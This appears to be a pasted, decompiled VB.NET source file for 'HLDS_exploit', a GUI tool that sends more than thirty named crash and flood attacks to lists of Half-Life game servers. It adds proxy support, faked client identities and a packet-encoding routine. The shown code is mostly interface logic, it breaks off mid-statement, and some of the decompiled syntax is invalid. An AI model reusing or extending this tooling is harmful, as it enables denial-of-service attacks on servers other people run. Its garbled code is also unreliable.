Advertisement
Guest User

zab

a guest
Dec 16th, 2017
405
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 172.24 KB | None | 0 0
  1. Imports HLDS_exploit
  2. Imports HLDS_exploit.Properties
  3. Imports MyProg
  4. Imports System
  5. Imports System.Collections.Generic
  6. Imports System.ComponentModel
  7. Imports System.Diagnostics
  8. Imports System.Drawing
  9. Imports System.IO
  10. Imports System.Linq
  11. Imports System.Net
  12. Imports System.Net.Sockets
  13. Imports System.Runtime.InteropServices
  14. Imports System.Text
  15. Imports System.Windows.Forms
  16.  
  17. Namespace HLDSexploit
  18. Public Class Form1
  19. Inherits Form
  20. ' Methods
  21. Public Sub New()
  22. Me.InitializeComponent
  23. Me.method.Text = "PICore"
  24. End Sub
  25.  
  26. Public Sub AppendText(ByVal [text] As String, ByVal color As Color, ByVal Optional AddNewLine As Boolean = False)
  27. If AddNewLine Then
  28. [text] = ([text] & Environment.NewLine)
  29. End If
  30. Me.LogRichBox.SelectionStart = Me.LogRichBox.TextLength
  31. Me.LogRichBox.SelectionLength = 0
  32. Me.LogRichBox.SelectionColor = color
  33. Me.LogRichBox.AppendText([text])
  34. Me.LogRichBox.SelectionColor = Me.LogRichBox.ForeColor
  35. End Sub
  36.  
  37. Private Sub asd2_TextChanged(ByVal sender As Object, ByVal e As EventArgs)
  38. End Sub
  39.  
  40. Private Sub AuthtypeComboBox_SelectedIndexChanged(ByVal sender As Object, ByVal e As EventArgs)
  41. If (Me.AuthtypeComboBox.SelectedIndex = 1) Then
  42. Me.checkBox2.Enabled = False
  43. Me.checkBox2.Checked = False
  44. Me.comboBox2.Enabled = False
  45. Me.textBox8.Text = "VALVE_ID_LAN"
  46. End If
  47. If (Me.AuthtypeComboBox.SelectedIndex = 2) Then
  48. Me.checkBox2.Enabled = False
  49. Me.checkBox2.Checked = False
  50. Me.comboBox2.Enabled = False
  51. Me.textBox8.Text = "VALVE_ID_LAN"
  52. End If
  53. If (Me.AuthtypeComboBox.SelectedIndex = 0) Then
  54. Me.checkBox2.Enabled = True
  55. Me.checkBox2.Checked = True
  56. Me.comboBox2.Enabled = True
  57. Me.textBox8.Text = "STEAM_ID_LAN (Random)"
  58. End If
  59. End Sub
  60.  
  61. Private Sub backgroundWorker1_DoWork(ByVal sender As Object, ByVal e As DoWorkEventArgs)
  62. End Sub
  63.  
  64. Private Sub Button1_Click(ByVal sender As Object, ByVal e As EventArgs)
  65. Dim text As String = Me.ServerListRichBox.Text
  66. If (Me.method.SelectedIndex = 8) Then
  67. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( SV_ParseVoiceData )" & ChrW(10))
  68. End If
  69. If (Me.method.SelectedIndex = 1) Then
  70. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( FileDeath 1.0 )" & ChrW(10))
  71. End If
  72. If (Me.method.SelectedIndex = 0) Then
  73. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( FileDeath 2.0 )" & ChrW(10))
  74. End If
  75. If (Me.method.SelectedIndex = 2) Then
  76. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( Spawn Malfunction )" & ChrW(10))
  77. End If
  78. If (Me.method.SelectedIndex = 3) Then
  79. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( Heavy Resources )" & ChrW(10))
  80. End If
  81. If (Me.method.SelectedIndex = 4) Then
  82. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( FakeConnect 2.0 )" & ChrW(10))
  83. End If
  84. If (Me.method.SelectedIndex = 6) Then
  85. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( KeysBugSpam )" & ChrW(10))
  86. End If
  87. If (Me.method.SelectedIndex = 7) Then
  88. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( Charachter Malfunction )" & ChrW(10))
  89. End If
  90. If (Me.method.SelectedIndex = 9) Then
  91. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( PU HL )" & ChrW(10))
  92. End If
  93. If (Me.method.SelectedIndex = 10) Then
  94. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( Born To Be Pig )" & ChrW(10))
  95. End If
  96. If (Me.method.SelectedIndex = 11) Then
  97. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( GZ_GetSpace Spam )" & ChrW(10))
  98. End If
  99. If (Me.method.SelectedIndex = 12) Then
  100. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( *CstrikeDir )" & ChrW(10))
  101. End If
  102. If (Me.method.SelectedIndex = 13) Then
  103. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( SV_FullUpdate )" & ChrW(10))
  104. End If
  105. If (Me.method.SelectedIndex = 14) Then
  106. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( IndexOfEdict )" & ChrW(10))
  107. End If
  108. If (Me.method.SelectedIndex = &H18) Then
  109. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( Bad Parse )" & ChrW(10))
  110. End If
  111. If (Me.method.SelectedIndex = &H17) Then
  112. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( Shutdown )" & ChrW(10))
  113. End If
  114. If (Me.method.SelectedIndex = &H16) Then
  115. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( The Unknown )" & ChrW(10))
  116. End If
  117. If (Me.method.SelectedIndex = &H15) Then
  118. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( KickASS-HLDS )" & ChrW(10))
  119. End If
  120. If (Me.method.SelectedIndex = &H1B) Then
  121. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( HL-Boom )" & ChrW(10))
  122. End If
  123. If (Me.method.SelectedIndex = 20) Then
  124. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( Jo's win32 )" & ChrW(10))
  125. End If
  126. If (Me.method.SelectedIndex = &H13) Then
  127. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( Jo's v2 )" & ChrW(10))
  128. End If
  129. If (Me.method.SelectedIndex = &H12) Then
  130. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( FVU xD )" & ChrW(10))
  131. End If
  132. If (Me.method.SelectedIndex = &H11) Then
  133. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( Fuck DProto v1 )" & ChrW(10))
  134. End If
  135. If (Me.method.SelectedIndex = &H10) Then
  136. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( SV_ParseCvarValue2 )" & ChrW(10))
  137. End If
  138. If (Me.method.SelectedIndex = &H19) Then
  139. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( HL BOF )" & ChrW(10))
  140. End If
  141. If (Me.method.SelectedIndex = &H1A) Then
  142. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( HL Headnut )" & ChrW(10))
  143. End If
  144. If (Me.method.SelectedIndex = &H1B) Then
  145. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( KickASS-HLDS v1 )" & ChrW(10))
  146. End If
  147. If (Me.method.SelectedIndex = &H1F) Then
  148. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( SV_ParseConsistencyResponse )" & ChrW(10))
  149. End If
  150. If (Me.method.SelectedIndex = &H20) Then
  151. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( WarGods Killer )" & ChrW(10))
  152. End If
  153. If (Me.method.SelectedIndex = &H21) Then
  154. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( PICore )" & ChrW(10))
  155. End If
  156. If Not ((Me.method.SelectedIndex <> &H1D) OrElse String.IsNullOrEmpty(Me.ServerListRichBox.Text)) Then
  157. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( KickASS-HLDS v3 )" & ChrW(10))
  158. Me.timer2.Start
  159. ElseIf Not ((Me.method.SelectedIndex <> &H22) OrElse String.IsNullOrEmpty(Me.ServerListRichBox.Text)) Then
  160. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( MasterServer ClientFake )" & ChrW(10))
  161. Me.timer2.Start
  162. ElseIf Not ((Me.method.SelectedIndex <> 30) OrElse String.IsNullOrEmpty(Me.ServerListRichBox.Text)) Then
  163. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( KickASS-HLDS v4 )" & ChrW(10))
  164. Me.timer2.Start
  165. ElseIf Not ((Me.method.SelectedIndex <> &H1C) OrElse String.IsNullOrEmpty(Me.ServerListRichBox.Text)) Then
  166. Me.LogRichBox.Text = (" " & [text] & ">> Sending Exploit... ( KickASS-HLDS v2 )" & ChrW(10))
  167. Me.timer2.Start
  168. Else
  169. Dim num As Integer
  170. Me.timer1.Start
  171. If (Integer.TryParse(Me.textBox5.Text, num) AndAlso (num > 0)) Then
  172. Me.timer1.Interval = num
  173. End If
  174. End If
  175. End Sub
  176.  
  177. Private Sub button2_Click_1(ByVal sender As Object, ByVal e As EventArgs)
  178. Me.timer2.Stop
  179. Me.timer1.Stop
  180. End Sub
  181.  
  182. Private Sub button3_Click_1(ByVal sender As Object, ByVal e As EventArgs)
  183. Dim num As Integer = CInt(New Form4().ShowDialog)
  184. End Sub
  185.  
  186. Private Sub button4_Click(ByVal sender As Object, ByVal e As EventArgs)
  187. If Directory.Exists("settings/logs") Then
  188. Process.Start("settings\logs")
  189. End If
  190. End Sub
  191.  
  192. Private Sub button4_MouseClick(ByVal sender As Object, ByVal e As MouseEventArgs)
  193. If Not Directory.Exists("settings/logs") Then
  194. Dim num As Integer = CInt(MessageBox.Show("Directory ""settings/logs"" not exist.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand))
  195. End If
  196. End Sub
  197.  
  198. Private Sub button5_Click(ByVal sender As Object, ByVal e As EventArgs)
  199. Me.LogRichBox.Text = String.Concat(New Object() { DateTime.Now.Hour.ToString, ":", DateTime.Now.Minute, ":", DateTime.Now.Second, ": Code by SkillartzHD & Spawner11", Environment.NewLine, Environment.NewLine })
  200. End Sub
  201.  
  202. Private Sub button6_Click(ByVal sender As Object, ByVal e As EventArgs)
  203. End Sub
  204.  
  205. Private Sub button6_MouseMove(ByVal sender As Object, ByVal e As MouseEventArgs)
  206. If (e.Button = MouseButtons.Left) Then
  207. Form1.ReleaseCapture
  208. Form1.SendMessage(MyBase.Handle, &HA1, 2, 0)
  209. End If
  210. End Sub
  211.  
  212. Private Sub button7_Click(ByVal sender As Object, ByVal e As EventArgs)
  213. Directory.CreateDirectory("settings")
  214. Directory.CreateDirectory("settings/logs")
  215. Dim path As String = "settings/hlds_servers.txt"
  216. Dim str2 As String = "settings/hlds_proxys.txt"
  217. Dim writer As New StreamWriter("settings/hlds_name.txt")
  218. writer.Write(Me.NicknamesRichBox.Text)
  219. writer.Close
  220. Dim writer2 As New StreamWriter(path)
  221. writer2.Write(Me.ServerListRichBox.Text)
  222. writer2.Close
  223. Dim writer3 As New StreamWriter(str2)
  224. writer3.Write(Me.HLProxyRichBox.Text)
  225. writer3.Close
  226. Environment.Exit(0)
  227. End Sub
  228.  
  229. Private Sub button7_MouseClick(ByVal sender As Object, ByVal e As MouseEventArgs)
  230. End Sub
  231.  
  232. Private Sub button8_Click(ByVal sender As Object, ByVal e As EventArgs)
  233. Me.textBox14.Text = String.Empty
  234. Dim i As Integer
  235. For i = 0 To Me.textBox13.Lines.Length - 1
  236. If Not String.IsNullOrEmpty(Me.textBox13.Lines(i)) Then
  237. Dim num2 As Integer = 0
  238. Try
  239. Dns.GetHostEntry(Me.textBox13.Lines(i))
  240. Catch exception As SocketException
  241. num2 = 1
  242. End Try
  243. If (num2 = 0) Then
  244. Dim hostAddresses As IPAddress() = Dns.GetHostAddresses(Me.textBox13.Lines(i))
  245. Dim j As Integer
  246. For j = 0 To hostAddresses.Length - 1
  247. Me.textBox14.AppendText((hostAddresses(j).ToString & ":27015" & Environment.NewLine))
  248. Me.textBox14.SelectionStart = Me.textBox14.Text.Length
  249. Me.textBox14.ScrollToCaret
  250. Next j
  251. End If
  252. End If
  253. Next i
  254. End Sub
  255.  
  256. Private Sub checkBox1_CheckedChanged(ByVal sender As Object, ByVal e As EventArgs)
  257. If Me.checkBox11.Checked Then
  258. Me.checkBox1.Checked = True
  259. End If
  260. If Me.checkBox1.Checked Then
  261. Me.NicknamesRichBox.Enabled = False
  262. Me.checkBox17.Enabled = True
  263. Me.textBox16.Enabled = True
  264. Else
  265. Me.checkBox17.Enabled = False
  266. Me.textBox16.Enabled = False
  267. Me.textBox16.Text = "15"
  268. Me.NicknamesRichBox.Enabled = True
  269. End If
  270. End Sub
  271.  
  272. Private Sub checkBox10_CheckedChanged(ByVal sender As Object, ByVal e As EventArgs)
  273. End Sub
  274.  
  275. Private Sub checkBox11_CheckedChanged(ByVal sender As Object, ByVal e As EventArgs)
  276. If Me.checkBox11.Checked Then
  277. Me.checkBox1.Checked = True
  278. Else
  279. Me.checkBox1.Checked = True
  280. End If
  281. End Sub
  282.  
  283. Private Sub checkBox14_CheckedChanged_1(ByVal sender As Object, ByVal e As EventArgs)
  284. If Not Me.checkBox14.Checked Then
  285. Me.textBox8.Text = "STEAM_ID_LAN(Random)"
  286. Me.checkBox2.Checked = True
  287. Me.checkBox2.Enabled = True
  288. Else
  289. Me.textBox8.Text = "Steam Client"
  290. Me.checkBox2.Checked = False
  291. Me.checkBox2.Enabled = False
  292. End If
  293. End Sub
  294.  
  295. Private Sub checkBox15_CheckedChanged(ByVal sender As Object, ByVal e As EventArgs)
  296. If Me.saveSettings.Checked Then
  297. Dim file As New IniFile("savedSettings.ini")
  298. file.Write("AutoSave", Convert.ToString(Me.saveSettings.Checked), Nothing)
  299. file.Write("rndName", Convert.ToString(Me.checkBox1.Checked), Nothing)
  300. file.Write("pwServer", Convert.ToString(Me.checkBox5.Checked), Nothing)
  301. file.Write("rndSteamID", Convert.ToString(Me.checkBox2.Checked), Nothing)
  302. file.Write("rndCDKey", Convert.ToString(Me.checkBox3.Checked), Nothing)
  303. file.Write("receiveConnection", Convert.ToString(Me.checkBox7.Checked), Nothing)
  304. file.Write("hlsocks", Convert.ToString(Me.checkBox4.Checked), Nothing)
  305. file.Write("hltvClient", Convert.ToString(Me.checkBox6.Checked), Nothing)
  306. file.Write("invalidName", Convert.ToString(Me.checkBox11.Checked), Nothing)
  307. file.Write("checkPing", Convert.ToString(Me.checkBox10.Checked), Nothing)
  308. file.Write("COM_Munge_Filter", Convert.ToString(Me.checkBox8.Checked), Nothing)
  309. file.Write("logFile", Convert.ToString(Me.checkBox12.Checked), Nothing)
  310. file.Write("UTF8Name", Convert.ToString(Me.checkBox18.Checked), Nothing)
  311. file.Write("receiveSetinfo", Convert.ToString(Me.checkBox16.Checked), Nothing)
  312. file.Write("repeat", Convert.ToString(Me.checkBox9.Checked), Nothing)
  313. file.Write("steamClient", Convert.ToString(Me.checkBox14.Checked), Nothing)
  314. file.Write("followRedirect", Convert.ToString(Me.checkBox19.Checked), Nothing)
  315. file.Write("advancedPacket", Convert.ToString(Me.checkBox13.Checked), Nothing)
  316. file.Write("runOnce", Convert.ToString(Me.runOnce.Checked), Nothing)
  317. file.Write("nameLength", Convert.ToString(Me.checkBox17.Checked), Nothing)
  318. Dim num As Integer = CInt(MessageBox.Show("Your settings are Saved.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Asterisk))
  319. End If
  320. End Sub
  321.  
  322. Private Sub checkBox17_CheckedChanged(ByVal sender As Object, ByVal e As EventArgs)
  323. End Sub
  324.  
  325. Private Sub checkBox17_CheckedChanged_1(ByVal sender As Object, ByVal e As EventArgs)
  326. If Me.checkBox17.Checked Then
  327. Me.textBox16.Enabled = True
  328. End If
  329. If Not Me.checkBox17.Checked Then
  330. Me.textBox16.Text = "15"
  331. Me.textBox16.Enabled = False
  332. End If
  333. End Sub
  334.  
  335. Private Sub checkBox18_CheckedChanged(ByVal sender As Object, ByVal e As EventArgs)
  336. End Sub
  337.  
  338. Private Sub checkBox2_CheckedChanged(ByVal sender As Object, ByVal e As EventArgs)
  339. If Not Me.checkBox2.Checked Then
  340. Me.comboBox2.Enabled = False
  341. End If
  342. If Me.checkBox2.Checked Then
  343. Me.comboBox2.Enabled = True
  344. End If
  345. If Me.checkBox2.Checked Then
  346. Me.textBox8.Text = "STEAM_ID_LAN (Random)"
  347. End If
  348. If Not Me.checkBox2.Checked Then
  349. Me.textBox8.Text = "STEAM_0:0:1337"
  350. End If
  351. End Sub
  352.  
  353. Private Sub checkBox3_CheckedChanged(ByVal sender As Object, ByVal e As EventArgs)
  354. If Me.checkBox3.Checked Then
  355. Me.textBox4.Enabled = False
  356. Else
  357. Me.textBox4.Enabled = True
  358. End If
  359. End Sub
  360.  
  361. Private Sub checkBox4_CheckedChanged_1(ByVal sender As Object, ByVal e As EventArgs)
  362. If Me.checkBox4.Checked Then
  363. Me.textBox1.Enabled = True
  364. Me.HLProxyRichBox.Enabled = True
  365. Else
  366. Me.HLProxyRichBox.Text = ""
  367. Me.textBox1.Enabled = False
  368. Me.HLProxyRichBox.Enabled = False
  369. End If
  370. End Sub
  371.  
  372. Private Sub checkBox5_CheckedChanged_1(ByVal sender As Object, ByVal e As EventArgs)
  373. If Me.checkBox5.Checked Then
  374. Me.textBox6.Enabled = True
  375. Else
  376. Me.textBox6.Enabled = False
  377. End If
  378. End Sub
  379.  
  380. Private Sub checkBox6_CheckedChanged(ByVal sender As Object, ByVal e As EventArgs)
  381. If (Me.AuthtypeComboBox.SelectedIndex = 1) Then
  382. Me.textBox8.Text = "VALVE_ID_LAN"
  383. End If
  384. If (Me.AuthtypeComboBox.SelectedIndex = 2) Then
  385. Me.textBox8.Text = "VALVE_ID_LAN"
  386. End If
  387. If (Me.AuthtypeComboBox.SelectedIndex = 0) Then
  388. Me.textBox8.Text = "STEAM_0:0:1337"
  389. End If
  390. If Me.checkBox6.Checked Then
  391. Me.textBox8.Text = "HLTV"
  392. Me.checkBox2.Enabled = False
  393. Me.checkBox2.Checked = False
  394. End If
  395. If Not Me.checkBox6.Checked Then
  396. Me.checkBox2.Enabled = True
  397. Me.checkBox2.Checked = False
  398. End If
  399. End Sub
  400.  
  401. Private Sub checkBox7_CheckedChanged(ByVal sender As Object, ByVal e As EventArgs)
  402. End Sub
  403.  
  404. Private Sub checkBox9_CheckedChanged(ByVal sender As Object, ByVal e As EventArgs)
  405. If Me.checkBox9.Checked Then
  406. Me.textBox9.Enabled = True
  407. Me.textBox9.Text = "1"
  408. End If
  409. If Not Me.checkBox9.Checked Then
  410. Me.textBox9.Enabled = False
  411. Me.textBox9.Text = "1"
  412. End If
  413. End Sub
  414.  
  415. Public Function COM_Munge(ByVal buffers As Byte()) As Byte()
  416. Dim num As Integer
  417. If (buffers.Length < 9) Then
  418. Return Nothing
  419. End If
  420. Dim destinationArray As Byte() = New Byte(((((buffers.Length / 4) * 4) + 4) + 4) - 1) {}
  421. Array.Copy(buffers, destinationArray, buffers.Length)
  422. Dim selector As Func(Of Byte, Integer, Byte) = Nothing
  423. Dim i As Integer = 0
  424. Do While (i < (buffers.Length / 4))
  425. If (selector Is Nothing) Then
  426. selector = (b, j) => b = CByte((b Xor CByte((((Me.Data.Table(((i + j) And 15)) Or (j << j)) Or j) Or &HA5))))
  427. End If
  428. Buffer.BlockCopy(BitConverter.GetBytes(CInt((BitConverter.ToInt32(Enumerable.ToArray(Of Byte)(Enumerable.Select(Of Byte, Byte)(Enumerable.Reverse(Of Byte)(DirectCast(BitConverter.GetBytes(DirectCast((BitConverter.ToUInt32(destinationArray, ((i * 4) + 8)) Xor Not destinationArray(0)), UInt32)), IEnumerable(Of Byte))), selector)), 0) Xor destinationArray(0)))), 0, destinationArray, ((i * 4) + 8), 4)
  429. num = i
  430. i = (num + 1)
  431. Loop
  432. Return Enumerable.ToArray(Of Byte)(Enumerable.Take(Of Byte)(DirectCast(destinationArray, IEnumerable(Of Byte)), buffers.Length))
  433. End Function
  434.  
  435. Public Function COM_UnMunge(ByVal buffers As Byte()) As Byte()
  436. Dim num As Integer
  437. If (buffers.Length < 9) Then
  438. Return Nothing
  439. End If
  440. Dim destinationArray As Byte() = New Byte(((((buffers.Length / 4) * 4) + 4) + 4) - 1) {}
  441. Array.Copy(buffers, destinationArray, buffers.Length)
  442. Dim selector As Func(Of Byte, Integer, Byte) = Nothing
  443. Dim i As Integer = 0
  444. Do While (i < (buffers.Length / 4))
  445. If (selector Is Nothing) Then
  446. selector = (b, j) => b = CByte((b Xor CByte((((Me.Data.Table(((i + j) And 15)) Or (j << j)) Or j) Or &HA5))))
  447. End If
  448. Buffer.BlockCopy(BitConverter.GetBytes(CInt((BitConverter.ToInt32(Enumerable.ToArray(Of Byte)(Enumerable.Reverse(Of Byte)(Enumerable.Select(Of Byte, Byte)(DirectCast(BitConverter.GetBytes(DirectCast((BitConverter.ToUInt32(destinationArray, ((i * 4) + 8)) Xor Not destinationArray(0)), UInt32)), IEnumerable(Of Byte)), selector))), 0) Xor destinationArray(0)))), 0, destinationArray, ((i * 4) + 8), 4)
  449. num = i
  450. i = (num + 1)
  451. Loop
  452. Return Enumerable.ToArray(Of Byte)(Enumerable.Take(Of Byte)(DirectCast(destinationArray, IEnumerable(Of Byte)), buffers.Length))
  453. End Function
  454.  
  455. Private Sub comboBox1_SelectedIndexChanged(ByVal sender As Object, ByVal e As EventArgs)
  456. If (Me.comboBox1.SelectedIndex = 2) Then
  457. Me.textBox11.Enabled = True
  458. Else
  459. Me.textBox11.Enabled = False
  460. End If
  461. End Sub
  462.  
  463. Private Sub comboBox2_SelectedIndexChanged(ByVal sender As Object, ByVal e As EventArgs)
  464. End Sub
  465.  
  466. Protected Overrides Sub Dispose(ByVal disposing As Boolean)
  467. If (disposing AndAlso (Not Me.components Is Nothing)) Then
  468. Me.components.Dispose
  469. End If
  470. MyBase.Dispose(disposing)
  471. End Sub
  472.  
  473. Public Shared Function fix2(ByVal i As Integer, ByVal Optional start As Integer = 1) As Byte
  474. Dim j As Integer = start
  475. Do While (j <= &HFF)
  476. If (Form1.fixbug(i, 1) >= &HFF) Then
  477. Form1.here = (start + Form1.holdV)
  478. Exit Do
  479. End If
  480. j += 1
  481. Loop
  482. Return CByte(Form1.here)
  483. End Function
  484.  
  485. Public Shared Function fixbug(ByVal i As Integer, ByVal Optional start As Integer = 1) As Byte
  486. If ((i <= &HFF) OrElse (i <> &HFF)) Then
  487. Return CByte(i)
  488. End If
  489. Return CByte(start)
  490. End Function
  491.  
  492. Public Shared Function fixbug2(ByVal i As Integer) As Byte
  493. Return CByte(New Random().Next(4))
  494. End Function
  495.  
  496. Private Sub Form1_FormClosed(ByVal sender As Object, ByVal e As FormClosedEventArgs)
  497. Settings.Default.Save
  498. End Sub
  499.  
  500. Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs)
  501. Dim writer As StreamWriter
  502. Dim reader As StreamReader
  503. Dim file As New IniFile("savedSettings.ini")
  504. If (file.Read("AutoSave", Nothing) = "True") Then
  505. Dim str As String = file.Read("rndName", Nothing)
  506. Dim str2 As String = file.Read("pwServer", Nothing)
  507. Dim str3 As String = file.Read("rndSteamID", Nothing)
  508. Dim str4 As String = file.Read("rndCDKey", Nothing)
  509. Dim str5 As String = file.Read("receiveConnection", Nothing)
  510. Dim str6 As String = file.Read("hlsocks", Nothing)
  511. Dim str7 As String = file.Read("hltvClient", Nothing)
  512. Dim str8 As String = file.Read("invalidName", Nothing)
  513. Dim str9 As String = file.Read("checkPing", Nothing)
  514. Dim str10 As String = file.Read("COM_Munge_Filter", Nothing)
  515. Dim str11 As String = file.Read("logFile", Nothing)
  516. Dim str12 As String = file.Read("UTF8Name", Nothing)
  517. Dim str13 As String = file.Read("receiveSetinfo", Nothing)
  518. Dim str14 As String = file.Read("steamClient", Nothing)
  519. Dim str15 As String = file.Read("repeat", Nothing)
  520. file.Read("followRedirect", Nothing)
  521. Dim str16 As String = file.Read("advancedPacket", Nothing)
  522. file.Read("runOnce", Nothing)
  523. Dim str17 As String = file.Read("nameLength", Nothing)
  524. Me.checkBox1.Checked = Convert.ToBoolean(str)
  525. Me.checkBox5.Checked = Convert.ToBoolean(str2)
  526. Me.checkBox3.Checked = Convert.ToBoolean(str3)
  527. Me.checkBox7.Checked = Convert.ToBoolean(str4)
  528. Me.checkBox4.Checked = Convert.ToBoolean(str5)
  529. Me.checkBox6.Checked = Convert.ToBoolean(str6)
  530. Me.checkBox11.Checked = Convert.ToBoolean(str7)
  531. Me.checkBox10.Checked = Convert.ToBoolean(str8)
  532. Me.checkBox8.Checked = Convert.ToBoolean(str9)
  533. Me.checkBox12.Checked = Convert.ToBoolean(str10)
  534. Me.checkBox18.Checked = Convert.ToBoolean(str11)
  535. Me.checkBox16.Checked = Convert.ToBoolean(str12)
  536. Me.checkBox9.Checked = Convert.ToBoolean(str13)
  537. Me.checkBox14.Checked = Convert.ToBoolean(str14)
  538. Me.checkBox19.Checked = Convert.ToBoolean(str15)
  539. Me.checkBox13.Checked = Convert.ToBoolean(str16)
  540. Me.checkBox17.Checked = Convert.ToBoolean(str17)
  541. End If
  542. Me.AppendText(String.Concat(New Object() { DateTime.Now.Hour.ToString, ":", DateTime.Now.Minute, ":", DateTime.Now.Second, " >> Coded by SkillartzHD & Spawner", Environment.NewLine, Environment.NewLine }), Color.Yellow, True)
  543. Directory.CreateDirectory("settings")
  544. Dim path As String = "settings/hlds_servers.txt"
  545. Dim str19 As String = "settings/hlds_proxys.txt"
  546. Dim str20 As String = "settings/license.txt"
  547. Dim str21 As String = "settings/hlds_name.txt"
  548. Dim str22 As String = "settings/packets_func.txt"
  549. If Not File.Exists(str22) Then
  550. writer = New StreamWriter(str22)
  551. writer.Write("hello")
  552. writer.Close
  553. End If
  554. If Not File.Exists(str21) Then
  555. writer = New StreamWriter(str21)
  556. writer.WriteLine("ya7wiiini")
  557. writer.WriteLine("Zabzob")
  558. writer.WriteLine("YDK F ZB")
  559. writer.Close
  560. End If
  561. If Not File.Exists(path) Then
  562. Me.ServerListRichBox.Text = "127.0.0.1:27014"
  563. writer = New StreamWriter(path)
  564. writer.Write(Me.ServerListRichBox.Text)
  565. writer.Close
  566. End If
  567. If Not File.Exists(str19) Then
  568. writer = New StreamWriter(str19)
  569. writer.Write(Me.HLProxyRichBox.Text)
  570. writer.Close
  571. End If
  572. If Not File.Exists(str20) Then
  573. writer = New StreamWriter(str20)
  574. writer.Write("error")
  575. writer.Close
  576. End If
  577. Using reader = New StreamReader(New FileStream(str21, FileMode.Open, FileAccess.Read), Encoding.UTF8)
  578. Me.NicknamesRichBox.Text = reader.ReadToEnd
  579. End Using
  580. Using reader = New StreamReader(New FileStream(path, FileMode.Open, FileAccess.Read), Encoding.UTF8)
  581. Me.ServerListRichBox.Text = reader.ReadToEnd
  582. End Using
  583. Using reader = New StreamReader(New FileStream(str19, FileMode.Open, FileAccess.Read), Encoding.UTF8)
  584. Me.HLProxyRichBox.Text = reader.ReadToEnd
  585. End Using
  586. Me.Label4.Text = ("Servers : " & Enumerable.Count(Of String)((From line In DirectCast(Me.ServerListRichBox.Lines, IEnumerable(Of String))
  587. Where Not String.IsNullOrEmpty(line)
  588. Select line)).ToString)
  589. Me.Label1.Text = ("Name : " & Enumerable.Count(Of String)((From line In DirectCast(Me.NicknamesRichBox.Lines, IEnumerable(Of String))
  590. Where Not String.IsNullOrEmpty(line)
  591. Select line)).ToString)
  592. Me.label14.Text = ("HLProxy/HLSocks: " & Enumerable.Count(Of String)((From line In DirectCast(Me.HLProxyRichBox.Lines, IEnumerable(Of String))
  593. Where Not String.IsNullOrEmpty(line)
  594. Select line)).ToString)
  595. Dim random As New Random
  596. Me.textBox4.Text = New String(Enumerable.ToArray(Of Char)((From s In Enumerable.Repeat(Of String)("0123456789abc", &H20) Select s.Chars(random.Next(s.Length)))))
  597. Me.textBox9.Enabled = False
  598. Dim random As New Random
  599. Me.asd2.Text = (random.Next(&H11E1A300))
  600. Me.textBox11.Text = (random.Next(1, &H7530))
  601. Me.textBox4.Enabled = False
  602. Me.textBox1.Enabled = False
  603. Me.HLProxyRichBox.Enabled = False
  604. Me.NicknamesRichBox.Enabled = False
  605. Me.textBox6.Enabled = False
  606. Me.method.SelectedIndex = &H21
  607. Me.comboBox3.SelectedIndex = 0
  608. Me.comboBox2.SelectedIndex = 6
  609. Me.comboBox1.SelectedIndex = 0
  610. Me.AuthtypeComboBox.SelectedIndex = 0
  611. Me.ProtocolComboBox.SelectedIndex = 0
  612. End Sub
  613.  
  614. Private Sub groupBox2_Enter(ByVal sender As Object, ByVal e As EventArgs)
  615. End Sub
  616.  
  617. Private Sub groupBox3_Enter(ByVal sender As Object, ByVal e As EventArgs)
  618. End Sub
  619.  
  620. Private Sub groupBox5_Enter(ByVal sender As Object, ByVal e As EventArgs)
  621. End Sub
  622.  
  623. Private Sub HLProxyRichBox_KeyPress(ByVal sender As Object, ByVal e As KeyPressEventArgs)
  624. If Not Me.checkBox17.Checked Then
  625. If (((Not Char.IsControl(e.KeyChar) AndAlso Not Char.IsDigit(e.KeyChar)) AndAlso (e.KeyChar <> "."c)) AndAlso (e.KeyChar <> ":"c)) Then
  626. e.Handled = True
  627. End If
  628. If ((e.KeyChar = "."c) AndAlso ((e.KeyChar = ":"c) AndAlso (TryCast(sender,TextBox).Text.IndexOf("."c) > -1))) Then
  629. e.Handled = True
  630. End If
  631. End If
  632. End Sub
  633.  
  634. Private Sub HLProxyRichBox_TextChanged(ByVal sender As Object, ByVal e As EventArgs)
  635. Me.label14.Text = ("HLProxy/HLSocks: " & Enumerable.Count(Of String)((From line In DirectCast(Me.HLProxyRichBox.Lines, IEnumerable(Of String))
